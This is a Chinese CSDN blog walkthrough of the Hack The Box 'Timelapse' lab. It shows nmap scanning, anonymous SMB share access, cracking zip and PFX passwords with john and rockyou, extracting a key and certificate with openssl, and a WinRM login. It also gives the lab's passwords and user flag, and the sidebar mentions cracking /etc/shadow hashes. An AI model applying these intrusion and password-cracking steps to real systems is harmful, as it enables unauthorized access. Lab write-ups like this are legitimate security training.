Hack The Box-Timelapse

最新推荐文章于 2024-10-10 14:15:00 发布
最新推荐文章于 2024-10-10 14:15:00 发布
阅读量343 收藏
点赞数 1
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49354488/article/details/125603083
版权

Timelapse

打开网站发现打不开,扫描一下端口

 nmap -A -sV -sC -T4 -p "*"  10.10.11.152

image-20220704154833641

看到了开了445端口,smb服务,尝试使用匿名登陆

使用smbmap枚举整个域中的samba共享驱动器

smbmap -u guest -p "" -H 10.10.11.152

image-20220704155637221

发现Shares可以利用

smbclient -U "guest" -p ""  //10.10.11.152/Shares

使用dir查看当先目录下有什么东西

image-20220704155950411

查看这两个文件夹下有什么东西

image-20220704160152764

发现Dev下是个备份文件

使用get命令把他下载下来

image-20220704160626327

发现压缩包里面是进行加密的,我们也不知道密码

image-20220704160648681

使用zip2john命令将哈希值提取出来

zip2john winrm_backup.zip > hash

image-20220704160831586

使用john命令对其爆破,得到密码supremelegacy

john --wordlist=/usr/share/wordlists/rockyou.txt hash 

# 注意:这是正常操作,因为我之前已经爆破过了,所以需要使用以下命令才会显示密码
john --show hash

image-20220704160952296

解压出来,是一个pfx格式

// PFX格式百度百科解释
公钥加密技术12号标准(Public Key Cryptography Standards #12,PKCS#12)为存储和传输用户或服务器私钥、公钥和证书指定了一个可移植的格式。它是一种二进制格式,这些文件也称为PFX文件。

pfx文件是经过秘钥加密的,我们可以使用命令openssl进行分析,并且要同时使用pkcs12文件工具,生成和分析pkcs12文件

发现我们之前爆破的密码不能用

image-20220704161635860

这里我们需要用命令pfx2john对pfx文件的hash导出

pfx2john  legacyy_dev_auth.pfx >pfx_hash

image-20220704161729175

再次使用john爆破一下

john --wordlist=/usr/share/wordlists/rockyou.txt pfx_hash 

# 注意:这是正常操作,因为我之前已经爆破过了,所以需要使用以下命令才会显示密码
john --show pfx_hash

得到密码thuglegacy这个密码需要经常用到。

image-20220704162022246

回到我们之前的openssl进行生成,三个密码都是我们之前生成的得到的thuglegacy,得到了私钥文件

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key

image-20220704162242917

我们还需要在生成一个证书,才能够实现登陆,密码还是thuglegacy

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt

image-20220704162359986

因为在开头信息收集的时候看到了开启了5986端口,这个端口是用于横向渗透的端口,可以使用命令evil-winrm进行连接

具体参数可以百度看一下

evil-winrm -i 10.10.11.152 -S -c cert.crt -k prv.key -p -u

登陆时候密码还是thuglegacy

image-20220704162734752

这里 就直接说答案在哪了不多啰嗦了

user.txt在Desktop下

image-20220704162928583
得到答案01ffa3cff23a0ecd3d4cbd9abd8f1059因为有一些命令在操作中还需要输入密码,密码还是thuglegacy

image-20220704162936545

Pois0n#
关注
Hack The Box】windows练习-- Timelapse
人间体佐菲的博客
11-18 366
Hack The Box】windows练习-- Timelapse
Timelapse
weixin_45007073的博客
04-02 8709
信息收集 做信息收集的时候,发现是一台内网靶机,开放了很多内网相关的端口。我们也发现了一个域名timelapse.htb,我们可以添加到hosts文件中 目标开放了SMB服务,我们尝试是否可以匿名登录SMB服务。发现可以匿名登录,Shares目录可以进行读取 smbmap -u guest -p "" -H 10.10.11.152 然后我们尝试匿名登录到这个目录上,看到存在一个备份文件压缩包。我们将其下载下来进行进一步分析 smbclient \\\\10.10.11.152\\Shares -U
pfx文件提取私钥和公钥JAVA_从PFX文件中获取私钥、公钥证书、公钥
weixin_33805938的博客
02-28 1132
import org.apache.commons.codec.binary.Base64;import org.apache.commons.io.FileUtils;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.File;import java.security.K...
john破解kali密码
Ramona的博客
12-11 3944
实验环境:kali 实验工具:john 所用命令: 1.查看/etc目录下的shadow文档,此文档记录了所有用户的用户名及密码hash值 2.使用命令echo 用户名:密码 > shadow,将查到的用户名及hash另存到桌面的shadow文档 3.创建用户:useradd 用户名    修改密码:passwd 用户名,输入新密码 4.john暴力破解密码:john --fo...
Hack The Box -----------------------Active
大方子
12-16 6982
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
indi-timelapse
03-28
在"indi-timelapse-master"这个压缩包中,"master"通常意味着这是项目的主分支或者是最稳定的版本。解压后,我们可以期待找到项目源代码、文档、示例、测试用例等文件。源代码可能包含了一系列的Python脚本,用于...
pi-timelapse:Raspberry Pi计算机的延时应用程序
02-05
为Raspberry Pi构建了许多不同的Time-Lapse脚本和应用程序,但是我想根据自己的需要进行更具自定义的设置。 这是我录制的示例短时延时视频,该视频是我窗外的天空中的卷云(单击可在YouTube上查看): YouTube上...
dev-timelapse:创建项目创建过程中的时间流逝
04-29
npm install dev-timelapse -g 用法 dev-timelapse http://localhost:3000 或使用npx npx dev-timelapse http://localhost:3000 选项 选项 别名 描述 - 每一个 -e 屏幕截图之间的间隔 - 小路 -p 屏幕截图的...
osx-screen-timelapse:OSX的屏幕延时发生器
05-05
1. 安装与配置:首先,你需要从提供的压缩包"osx-screen-timelapse-master"中解压文件。然后,确保你的系统已经安装了Node.js,因为该项目依赖于Node.js环境运行。接下来,打开终端,导航到项目目录,并执行`npm ...
RPI-SFTP-Timelapse-Webcam
06-05
Raspberry Pi Timelapse 网络摄像头 Python 脚本将图像文件上传到您的 FTP 服务器。 这些文件将被放入数据子目录并通过 PHP 定期解析。 安装 在您的实验设置中包含 python 脚本。 您还需要安装 pysftp 模块,该模块...
Hackthebox入门
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
Hack the box靶机 tenten
菜浪马废的博客
09-22 444
wpscan -u http://10.10.10.10 -eu,p 发现用户名takis和插件job-manager 找到漏洞脚本 漏洞是文件包含漏洞,读取简历信息 得到了一个图片 steghide extract -sf HackerAccessGranted.jpg 得到的id_rsa需要密码 有密码了 ssh登录成功 ...
HackTheBox报错解决
weixin_45225566的博客
11-17 2004
HackTheBox连接VPN报错解决 最近想学一学渗透,但是用kali连接HackTheBox的VPN是总是报错,如下: Wed Nov 17 20:31:02 2021 OpenVPN 2.4.9 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Apr 21 2020 Wed Nov 17 20:31:02 2021 library versions: OpenSS
hackthebox 我的第一次
Ms08067安全实验室
12-23 1086
本文作者:time(Ms08067内网安全小组成员)time微信(欢迎骚扰交流):这是我第一次玩 hackthebox,就找个尽量简单点的,拿到ip先简单扫一扫那肯定只有80开始点击一看...
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
hackthebox资源收集
superprintf的博客
08-21 470
官网: https://www.hackthebox.eu/ writeup: 知乎Lucifiel https://seymour.hackstreetboys.ph/htb.html
Hack the box靶机 Lame
菜浪马废的博客
05-06 485
以为FTP会有东西呢 发现啥也没有 找一下samba 有漏洞 我看4.3的评分 可能会难 没想到啊没想到 这么简单 ****要是考试也这么简单就好了
445端口入侵详解
热门推荐
无界编程
03-23 7万+
445端口入侵详解   关于“445端口入侵”的内容445端口入侵详解本站搜索更多关于“445端口入侵”的内容 445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口                                                            ipc$一 摘要 二 什么是 ipc$ 三 什么是空会
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
10-10 1319
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
Authentication lapse 0 ms.
01-23
根据提供的引用内容,"Authentication lapse 0 ms."是一个错误信息,它表示在进行身份验证时出现了问题。这可能是由于连接被对等方重置或连接超时导致的。要解决此问题,可以尝试以下几种方法: 1. 检查网络连接:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值